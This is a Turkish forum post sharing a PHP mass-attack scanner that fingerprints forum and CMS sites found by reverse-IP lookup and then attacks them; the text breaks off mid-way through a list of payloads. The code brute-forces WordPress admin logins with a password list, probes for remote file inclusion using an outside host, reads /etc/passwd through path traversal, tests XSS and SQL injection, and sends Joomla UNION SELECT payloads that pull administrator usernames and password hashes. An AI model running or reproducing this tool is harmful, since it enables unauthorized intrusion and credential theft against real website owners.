Beyler ben buldum Tam düzgün kodları cw'den birinden istedim eriştim sizinle paylaşıyım
Buyrun Beyler ....
Kod:
<?
ob_start();
set_time_limit(0);
echo '<form action="" method=post><input type=text name=metalqear value=""><input type=submit><br>';
$metalqear = $_POST['metalqear'];
reverse1($metalqear);
//Script Tara *+--
function script_tara($metalqear) {
$metal=trim($metalqear);
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$metal);
$metals=curl_exec($curl);
if(eregi('SMF',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> SmF</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
ob_flush();
flush();
smf($metals);
}
elseif (eregi('vBulletin',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> Vbulletin</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
vbulletin($metals);
echo "</font><br>";
}
elseif(eregi('phpBB',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> PhpBb</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "=><font color=red> Versiyon Taraması :</font><font color=blue> Yapılmadı </font><br>";
ob_flush();
flush();
}
elseif(eregi('WordPress',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> WordPress </font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Plugin Listesi Ve Sürüm </font><br>";
wordpress($metals);
echo "<font color=red> Brute İslemi Başlatılıyor : </font>";
wordpress_brute($metal);
echo " Brute İslemi Tamamlanmıstır</font><br>";
ob_flush();
flush();
}
elseif(eregi('Joomla',$metals)){
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><font color=red> ==>> Joomla </font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo "<font color=green> Plugin Listesi </font><br>";
ob_flush();
flush();
joomla($metals);
echo "<font color=green> Joomla Lfi Açıkları Taranıyor.. </font><br>";
ob_flush();
flush();
joomla_lfi($metal);
echo "<font color=green> Joomla Templatelerde Shell Taranıyor.. </font><br>";
ob_flush();
flush();
joomla_shell($metal);
echo "<font color=green> Joomla Sql Açıkları Taranıyor.. </font><br>";
ob_flush();
flush();
joomla_sql($metal);
echo "<font color=green> Joomla Brute Baslatılıyor : </font>";
ob_flush();
flush();
joomla_login($metal);
echo " Brute İslemi Tamamlanmıstır<br>";
ob_flush();
flush();
}
else {
echo '--------------------------------------------------------------------<br><font color=red> Denenen Site :</font><font color=blue>'.$metal.'</font><br>';
echo "<font color=green> Sitede Shell Taranıyor </font><br>";
ob_flush();
flush();
server_shell($metal);
echo '<font color=green> Linkler Alınıyor </font><br>';
ob_flush();
flush();
preg_match_all("/href=\"([^\"]+)/i",$metals,$metal9);
foreach (array_unique($metal9[1]) as $amk) {
if(eregi('google.com',$amk)) {
}
elseif(eregi('facebook.com',$amk)) {
}
elseif(eregi('youtube.com',$amk)) {
}
elseif(eregi('microsoft.com',$amk)) {
}
elseif(eregi('addthis.com',$amk)) {
}
elseif(eregi('adobe.com',$amk)) {
}
elseif(eregi('w3.org',$amk)) {
}
elseif(eregi('twitter.com',$amk)) {
}
elseif(eregi('.html?',$amk)) {
}
elseif(eregi('.css',$amk)) {
}
elseif(eregi('index.php?option=',$amk)) {
}
elseif(eregi('MyBB',$amk)) {
}
elseif(eregi('@',$amk)) {
}
else {
if(eregi('http',$amk)) {
if(strstr($amk,"=")) {
$icerik = file_get_contents('link.txt');
$aaa = delLast($amk);
if(!eregi($aaa,$icerik)) {
$klas = fopen('link.txt','a');
$yaz = fwrite($klas,$amk."\r\n");
echo "=> <a href=$amk>$amk</a><br>";
ob_flush();
flush();
tara($amk);
}
}
}
else {
if(strstr($amk,"=")) {
$amks = $metal."/".$amk;
$aaa = delLast($amks);
$icerik = file_get_contents('link.txt');
if(!eregi($aaa,$icerik)) {
echo "=> <a href=$amks>$amks</a><br>";
ob_flush();
flush();
$klas = fopen('link.txt','a');
$yaz = fwrite($klas,$amks."\r\n");
tara($amks);
}
}
}
}
}
}
}
//sondaki esittire kadar alma *+--
function delLast($u){
$url = $u;
$_t1 = explode("=", $url );
unset($_t1[count($_t1)-1]);
$_t1 = implode("=",$_t1);
return $_t1;
}
//sondaki esittire kadar alma *+--
function sqlicin($u){
$url = $u;
$_t1 = explode("&", $url );
unset($_t1[count($_t1)-1]);
$_t1 = implode("&",$_t1);
return $_t1;
}
//Reverse Ip *+--
function reverse1($metalqear) {
if(isset($metalqear)) {
$ip = gethostbyname($metalqear);
$fp = @fsockopen($ip, 3306, $errno, $errstr, 1);
if (!$fp) {
coklu_reverse($metalqear);
ob_flush();
flush();
$site = file_get_contents("reverse.txt");
$sitelist = explode("\n",$site);
foreach($sitelist as $yenilist){
$temiz=trim($yenilist);
$site=$temiz;
script_tara($site);
}
}
else {
coklu_reverse($metalqear);
ob_flush();
flush();
$site = file_get_contents("reverse.txt");
$sitelist = explode("\n",$site);
foreach($sitelist as $yenilist){
$temiz=trim($yenilist);
$site=$temiz;
script_tara2($site);
}
}
}
}
//Vbulletin Versiyon Al *+--
function vbulletin($metals) {
preg_match_all('#<meta name="generator" content="(.*?)" />#si', $metals , $amks );
foreach($amks[1] as $sikici ) {
echo "=><font color=red>Versiyon :</font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sikici&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve= >Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
}
//Smf Versiyon Al *+--
function smf($metals) {
preg_match_all('#title="Simple Machines Forum" target="_blank">(.*?)</a>#si', $metals , $amks1 );
preg_match_all('#title="Simple Machines Forum" target="_blank" class="new_win">(.*?)</a>#si', $metals , $amks2 );
foreach($amks1[1] as $sikici ) {
echo "=><font color=red>Versiyon :</font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sikici&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve= >Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
foreach($amks2[1] as $sikici ) {
echo "=><font color=red>Versiyon :</font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sikici&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve= >Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
}
//Wordpress Versiyon Al *+--
function wordpress($metals) {
preg_match_all('#/wp-content/plugins/(.*?)/#si', $metals , $amks );
preg_match_all('#<meta name="generator" content="(.*?)" />#si', $metals , $amks2 );
foreach(array_unique($amks2[1]) as $sikici ) {
$sit = strtr($sikici," ","%20");
echo "=><FONT Color=red> Versiyon : </font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sit&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve= >Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
foreach(array_unique($amks[1]) as $sikici ) {
$sit = strtr($sikici,"-","%20");
echo "=><FONT Color=red> Plugin : </font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sit&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve= >Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
}
//Joomla Versiyon Al *+--
function joomla($metals) {
preg_match_all('{option,(.*?)/}i',$metals,$amks);
preg_match_all('{option=(.*?)(&|&|")}i',$metals,$amks1);
preg_match_all('{/components/(.*?)/}i',$metals,$amks2);
foreach(array_unique($amks[1]) as $sikici ) {
echo "=><FONT Color=red> Plugin : </font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sikici&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=>Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
foreach(array_unique($amks2[1]) as $sikici ) {
echo "=><FONT Color=red> Plugin : </font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sikici&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=>Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
foreach(array_unique($amks1[1]) as $sikici ) {
echo "=><FONT Color=red> Plugin : </font><font color=blue>".$sikici."</font> || <a href=http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$sikici&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=>Exploit-db.com'Da Ara</a><br>";
ob_flush();
flush();
}
}
//Wordpress Brute *+--
function wordpress_brute($site) {
$password = array("123456789",
"12345678",
"1234567",
"123456",
"12345",
"543210",
"6543210",
"7654321",
"654321",
"76543210",
"987654321",
"9876543210",
"0123456",
"012345",
"01234567",
"01234568",
"0123456789",
"abcdef",
"abcdefg",
"abcde",
"abc123",
"abcd123",
"qwe",
"qwerty123",
"qwerty1",
"qwerty2",
"qwerty12",
"qwerty3",
"111111",
"1111111",
"11111111",
"111111111",
"000000",
"0000000",
"00000000",
"000000000",
"00000",
"99999",
"999999",
"9999999",
"99999999",
"212121",
"21212121",
"31313131",
"313131",
"696696",
"363363",
"admin",
"password",
"sifrem",
"sifre",
"sifre123",
"sifre1",
"sifre12",
"admin123",
"admin1",
"admin12",
"sifrem1",
"sifrem2",
"sifrem12",
"sifrem123",
"789456123",
"321654987",
"7895123",
"9875321",
"Admin",
"root",
"webmaster",
"master",
"pass",
"password",
"passwd",
"wordpress",
"admin1234",
"admin12345",
"admin123456",
"admin1234567",
"admin12345678",
"admin123456789",
"1453",
"sifremi",
"sifresiz");
for($i = 0 ; $i < 67 ; $i++) {
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site.'/wp-login.php');
curl_setopt($curl,CURLOPT_COOKIEJAR,"coki11.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE,"coki11.txt");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,TRUE);
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$password[$i]&wp-submit=Log+In&redirect_to=.$site./wp-admin/&testcookie=1");
$a = curl_exec($curl);
if(eregi ("profile.php",$a)){
echo "<font color=red>Kulladı : </font><font color=blue> admin </font><font color=red> Sifre : </font><font color=blue> $password[$i] </font><br>";
ob_flush();
flush();
}
}
}
//Link Tarama *+--
function tara($metalqear1) {
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$metalqear1 = trim($metalqear1);
$metalqear = explode('=',$metalqear1,2);
$rfi = 'http://gavtest.rr4.co.uk/r.txt?';
$lfi = '../../../../../../../../../../../../etc/passwd%00';
$lfi2 = '../../../../../../../../../../../../etc/passwd';
$sql = "'a";
$xss2 = '"><script>alert("m3t4l");</script>';
$xss = '<script>alert("m3t4l");</script>';
//RFI Taraması--
$shell = $metalqear[0]."=".$rfi;
curl_setopt($curl,CURLOPT_URL,$shell);
$shell1=curl_exec($curl);
if(eregi('MetaLqeaR',$shell1)) {
echo "<FONT COLOR=RED> RFI Bulundu = </FONT> <a href=$shell>$shell</a><br>";
ob_flush();
flush();
}
//LFI Taraması *+--
$taralfi = $metalqear[0]."=".$lfi;
curl_setopt($curl,CURLOPT_URL,$taralfi);
$tarat=curl_exec($curl);
if(eregi('root:x',$tarat)) {
echo "<FONT COLOR=RED>LFI Bulundu = </fONT> <a href=$taralfi>$taralfi</a><br>";
ob_flush();
flush();
}
else {
$taralfi2 = $metalqear[0]."=".$lfi2;
curl_setopt($curl,CURLOPT_URL,$taralfi2);
$tarat2=curl_exec($curl);
if(eregi('root:',$tarat2)) {
echo "<FONT COLOR=RED>LFI Bulundu = </fONT> <a href=$taralfi2>$taralfi2</a><br>";
ob_flush();
flush();
}
}
//Xss Taraması *+--
$taraxss = $metalqear[0]."=".$xss;
curl_setopt($curl,CURLOPT_URL,$taraxss);
$taratxss=curl_exec($curl);
if(eregi('"m3t4l"',$taratxss)) {
echo "<font color=red>Xss Bulundu = </font> ";
$amk1 = htmlspecialchars($taraxss);
echo "<a href=$amk1>$amk1</a><br>";
ob_flush();
flush();
}
else {
$taraxss2 = $metalqear[0]."=".$xss2;
curl_setopt($curl,CURLOPT_URL,$taraxss2);
$taratxss2=curl_exec($curl);
if(eregi('"m3t4l"',$taratxss2)) {
echo "<font color=red>Xss Bulundu = </font>";
$amk = htmlspecialchars($taraxss2);
echo "<a href=$amk>$amk</a><br>";
ob_flush();
flush();
}
}
//Sql Taraması *+--
$kontrols = substr($metalqear1 , -1);
if (ctype_digit ($kontrols)) {
$sqltara = $metalqear1.$sql;
curl_setopt($curl,CURLOPT_URL,$sqltara);
$sqltarat=curl_exec($curl);
if(eregi('MySQL server',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_array()',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('Sql syntax',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_row()',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br>";
ob_flush();
flush();
}
elseif(eregi('mysql_num_rows()',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ODBC SQL',$sqltarat)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara>$sqltara</a><br>";
ob_flush();
flush();
}
elseif(eregi('ORACLE',$sqltarat)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ORA-01756',$sqltarat)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Microsoft JET Database',$sqltarat)) {
echo "<font color=red> Access Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Unclosed quotation',$sqltarat)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
else {
$sql2 = str_replace("&","'&",$metalqear1);
$sqltara2 = $sql2;
curl_setopt($curl,CURLOPT_URL,$sqltara2);
$sqltarat2=curl_exec($curl);
if(eregi('MySQL server',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_array()',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('Sql syntax',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_row()',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br>";
ob_flush();
flush();
}
elseif(eregi('mysql_num_rows()',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ODBC SQL',$sqltarat2)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br>";
ob_flush();
flush();
}
elseif(eregi('ORACLE',$sqltarat2)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ORA-01756',$sqltarat2)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Microsoft JET Database',$sqltarat2)) {
echo "<font color=red> Access Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Unclosed quotation',$sqltarat2)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
}
}
else {
$ses = sqlicin($metalqear1);
$sqltara = $ses.$sql;
curl_setopt($curl,CURLOPT_URL,$sqltara);
$sqltarat=curl_exec($curl);
if(eregi('MySQL server',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_array()',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('Sql syntax',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_row()',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br>";
ob_flush();
flush();
}
elseif(eregi('mysql_num_rows()',$sqltarat)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ODBC SQL',$sqltarat)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara>$sqltara</a><br>";
ob_flush();
flush();
}
elseif(eregi('ORACLE',$sqltarat)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara>$sqltara</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ORA-01756',$sqltarat)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Microsoft JET Database',$sqltarat)) {
echo "<font color=red> Access Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Unclosed quotation',$sqltarat)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara>$sqltara</a> <br>";
ob_flush();
flush();
}
else {
$sql2 = str_replace("&","'&",$metalqear1);
$sqltara2 = $sql2;
curl_setopt($curl,CURLOPT_URL,$sqltara2);
$sqltarat2=curl_exec($curl);
if(eregi('MySQL server',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_array()',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('Sql syntax',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
elseif(eregi('mysql_fetch_row()',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br>";
ob_flush();
flush();
}
elseif(eregi('mysql_num_rows()',$sqltarat2)) {
echo "<font color=red> Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ODBC SQL',$sqltarat2)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br>";
ob_flush();
flush();
}
elseif(eregi('ORACLE',$sqltarat2)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a><br> ";
ob_flush();
flush();
}
elseif(eregi('ORA-01756',$sqltarat2)) {
echo "<font color=red> Oracle Sql Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Microsoft JET Database',$sqltarat2)) {
echo "<font color=red> Access Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
elseif(eregi('Unclosed quotation',$sqltarat2)) {
echo "<font color=red> Mssql Bulundu = </font> <a href=$sqltara2>$sqltara2</a> <br>";
ob_flush();
flush();
}
}
}
// Blind Sql Taraması *--
$aa = $metalqear1."'";
$bb = $metalqear1." and 1=1";
$d=@file_get_contents($aa);
$f=@file_get_contents($bb);
if($d!=$f)
{
if(eregi('1=1',$f))
{
}
else {
echo "<font color=red> Blind sql Bulundu = </font> <a href=$bb>$bb</a> <br>";
}
}
}
//Joomla Lfi Taraması *+--
function joomla_lfi($metal) {
$joomlalfi[0] = "/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00";
$joomlalfi[1] = "/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[2] = "/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd";
$joomlalfi[3] = "/index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[4] = "/index.php?option=com_people&controller=../../../../../../../../../../../../etc/passwd%00 ";
$joomlalfi[5] = "/components/com_xmovie/helpers/img.php?file=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[6] = "/components/com_xgallery/helpers/img.php?file=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[7] = "/index.php?option=com_jotloader§ion=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[8] = "/index.php?option=com_jeauto&view=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[9] = "/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[0] = "/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[11] = "/index.php?option=com_img&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[12] = "/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[13] = "/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[14] = "/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[15] = "/index.php?option=com_connect&view=connect&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[16] = "/index.php?option=com_jphone&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[17] = "/index.php?option=com_jgrid&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[18] = "/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[19] = "/jobcomponent/index.php?option=com_jejob&view=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[20] = "/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[21] = "/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[22] = "/index.php?option=com_mediqna&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[23] = "/index.php?option=com_simpledownload&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[24] = "/index.php?option=com_mscomment&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[25] = "/index.php?option=com_jequoteform&view=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[26] = "/index.php?option=com_jotloader§ion=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[27] = "/components/com_xgallery/helpers/img.php?file=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[28] = "/components/com_xmovie/helpers/img.php?file=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[29] = "/index.php?option=com_jmsfileseller&view=../../../../../../../../../../../../etc/passwd%00&cat_id=12&Itemid=27";
$joomlalfi[30] = "/index.php?option=com_acooldebate&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[31] = "/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.css";
$joomlalfi[32] = "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js";
$joomlalfi[33] = "/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd%00.css";
$joomlalfi[34] = "/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js";
$joomlalfi[35] = "/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd%00.js";
$joomlalfi[36] = "/index.php?option=com_rsappt_pro2&view=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[37] = "/index.php?option=com_obsuggest&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[38] = "/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[39] = "/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../etc/passwd%00";
$joomlalfi[40] = "/include.php?file=/etc/passwd";
$joomlalfi[41] = "/index.php?site=/etc/passwd";
for($i = 0 ; $i < 42 ; $i++)
{
$joomla1 = $metal.$joomlalfi[$i];
$curl=curl_init();
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$joomla1);
$tarat=curl_exec($curl);
if(eregi('root:',$tarat)) {
echo "=><FONT COLOR=RED>Joomla LFI Bulundu = </fONT> <a href=$joomla1 > $joomla1 </a><br>";
ob_flush();
flush();
}
}
}
//Joomla Sql Taraması *--
function joomla_sql($metal) {
$joomlasql[0] = "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x3a,username,0x3a,password,0x3a),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[1] = "/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(0x3a,username,0x3a,password,0x3a)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1";
$joomlasql[2] = "/index.php?option=com_resman&task=moreinfo&id=-1+UNION+SELECT+111,concat(0x3a,username,0x3a,password,0x3a),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[3] = "/index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999+UNION+SELECT+concat(0x3a,username,0x3a,password,0x3a)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[4] = "/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999+UNION+SELECT+concat(0x3a,username,0x3a,password,0x3a)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[5] = "/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[6] = "/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat (0x3a,username,0x3a,password,0x3a),8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[7] = "/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999+UNION+SELECT+0,concat(0x3a,username,0x3a,password,0x3a),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[8] = "/index.php?option=com_candle&task=content&cID=-9999+UNION+SELECT+1,2,3,concat(0x3a,username,0x3a,password,0x3a),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[9] = "/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x3a,username,0x3a,password,0x3a)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[10] = "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x3a,username,0x3a,password,0x3a),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--";
$joomlasql[11] = "/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(0x3a,username,0x3a,password,0x3a)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- ";
